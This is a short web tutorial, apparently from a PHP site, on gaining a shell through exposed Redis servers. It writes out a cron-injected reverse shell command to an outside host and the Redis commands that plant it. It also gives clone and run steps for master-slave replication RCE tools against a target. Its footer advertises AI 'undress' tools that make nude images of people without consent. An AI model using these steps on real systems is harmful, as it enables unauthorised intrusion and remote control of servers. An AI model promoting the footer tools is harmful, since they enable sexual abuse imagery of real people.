Example analysis of Redis+Getshell
Foreword:
Normally, when conducting authorization penetration testing, even if traditional vulnerability attacks (such as injection, file upload, etc.) are tried, no information can be obtained. Scanning ports may still bring unexpected gains.
Knowing oneself and knowing the enemy is the best way to win a hundred battles. Redis introduction:
Simply speaking, redis is a Key-Value type database. All data in redis are operated in memory, and it Data in memory can be stored on disk periodically, and supports saving a variety of data structures (String, hash, list, etc.).
In the midst of strategizing, Redis vulnerabilities:
1. Unauthorized access vulnerability
Redis By default, it will be bound to 0.0.0.0:6379. If IP access is not restricted, the Redis service will be exposed to the public network, and if password authentication is not set, any user will not be authorized to access Redis. As well as reading Redis data and writing public keys for remote connection, etc.
We will not be satisfied when we get the database permissions. Our goal is only getshell!
There are currently two more mainstream methods, the first is to schedule a rebound shell regularly, and the second is to use master-slave replication rce.
2. Scheduled rebound shell
1) set x "\n* * * * * bash -i >& /dev/tcp/ 1.1.1.1/888 0>&1\n"
2) config set dir /var/spool/cron/
3) config set dbfilename root
4) save
3. Using master-slave replication rce
The vulnerability exists in versions 4.x and 5.x. Redis provides a master-slave mode. The mode refers to using one redis as the host and the other as the backup machine. The host and slave data are the same. The slave is only responsible for reading, and the master is only responsible for writing. After Reids 4.x, through external expansion, it is possible to implement a new Redis command in redis and construct a malicious .so file. When two Redis instances are set in master-slave mode, the Redis host instance can synchronize files to the slave machine through FULLRESYNC. Then load the malicious so file on the slave machine to execute the command.
You need to use a tool, just download it from GitHub.
1) git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand (requires make)
2) git clone https://github.com/Ridter/ redis-rce.git
Then connect to redis through unauthorized access or weak password, and execute the script to obtain the shell. 
Decisive victory thousands of miles away, actual combat drill:
This time I scanned 6379, which is Redis. Sometimes the default port may be changed. It is recommended to scan the whole port. This time, the master-slave copy rce is used to obtain the shell (since the vulnerability has been submitted to src and a confidentiality agreement has been signed, a target machine is built to restore the real environment to ensure the authenticity.)
attack End IP: 192.168.109.134
Server IP: 192.168.109.136
Connect to redis through unauthorized access (if you have a password, you can try to blast and log in to the system with authpassword) :Redis-cli –h ip
Use master-slave copy rce to obtain shell
First, generate a malicious .so file, download RedisModules-ExecuteCommand and use make to compile it. 
Attack end execution:
python redis-rce.py -r target ip -p target port -L local ip -f malicious.so
successfully obtain shell
The above is the detailed content of Example analysis of Redis+Getshell. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to build the redis cluster mode
Apr 10, 2025 pm 10:15 PM
Redis cluster mode deploys Redis instances to multiple servers through sharding, improving scalability and availability. The construction steps are as follows: Create odd Redis instances with different ports; Create 3 sentinel instances, monitor Redis instances and failover; configure sentinel configuration files, add monitoring Redis instance information and failover settings; configure Redis instance configuration files, enable cluster mode and specify the cluster information file path; create nodes.conf file, containing information of each Redis instance; start the cluster, execute the create command to create a cluster and specify the number of replicas; log in to the cluster to execute the CLUSTER INFO command to verify the cluster status; make
How to read redis queue
Apr 10, 2025 pm 10:12 PM
To read a queue from Redis, you need to get the queue name, read the elements using the LPOP command, and process the empty queue. The specific steps are as follows: Get the queue name: name it with the prefix of "queue:" such as "queue:my-queue". Use the LPOP command: Eject the element from the head of the queue and return its value, such as LPOP queue:my-queue. Processing empty queues: If the queue is empty, LPOP returns nil, and you can check whether the queue exists before reading the element.
How to clear redis data
Apr 10, 2025 pm 10:06 PM
How to clear Redis data: Use the FLUSHALL command to clear all key values. Use the FLUSHDB command to clear the key value of the currently selected database. Use SELECT to switch databases, and then use FLUSHDB to clear multiple databases. Use the DEL command to delete a specific key. Use the redis-cli tool to clear the data.
How to configure Lua script execution time in centos redis
Apr 14, 2025 pm 02:12 PM
On CentOS systems, you can limit the execution time of Lua scripts by modifying Redis configuration files or using Redis commands to prevent malicious scripts from consuming too much resources. Method 1: Modify the Redis configuration file and locate the Redis configuration file: The Redis configuration file is usually located in /etc/redis/redis.conf. Edit configuration file: Open the configuration file using a text editor (such as vi or nano): sudovi/etc/redis/redis.conf Set the Lua script execution time limit: Add or modify the following lines in the configuration file to set the maximum execution time of the Lua script (unit: milliseconds)
How to use the redis command line
Apr 10, 2025 pm 10:18 PM
Use the Redis command line tool (redis-cli) to manage and operate Redis through the following steps: Connect to the server, specify the address and port. Send commands to the server using the command name and parameters. Use the HELP command to view help information for a specific command. Use the QUIT command to exit the command line tool.
How to set the redis expiration policy
Apr 10, 2025 pm 10:03 PM
There are two types of Redis data expiration strategies: periodic deletion: periodic scan to delete the expired key, which can be set through expired-time-cap-remove-count and expired-time-cap-remove-delay parameters. Lazy Deletion: Check for deletion expired keys only when keys are read or written. They can be set through lazyfree-lazy-eviction, lazyfree-lazy-expire, lazyfree-lazy-user-del parameters.
How to implement redis counter
Apr 10, 2025 pm 10:21 PM
Redis counter is a mechanism that uses Redis key-value pair storage to implement counting operations, including the following steps: creating counter keys, increasing counts, decreasing counts, resetting counts, and obtaining counts. The advantages of Redis counters include fast speed, high concurrency, durability and simplicity and ease of use. It can be used in scenarios such as user access counting, real-time metric tracking, game scores and rankings, and order processing counting.
How to optimize the performance of debian readdir
Apr 13, 2025 am 08:48 AM
In Debian systems, readdir system calls are used to read directory contents. If its performance is not good, try the following optimization strategy: Simplify the number of directory files: Split large directories into multiple small directories as much as possible, reducing the number of items processed per readdir call. Enable directory content caching: build a cache mechanism, update the cache regularly or when directory content changes, and reduce frequent calls to readdir. Memory caches (such as Memcached or Redis) or local caches (such as files or databases) can be considered. Adopt efficient data structure: If you implement directory traversal by yourself, select more efficient data structures (such as hash tables instead of linear search) to store and access directory information
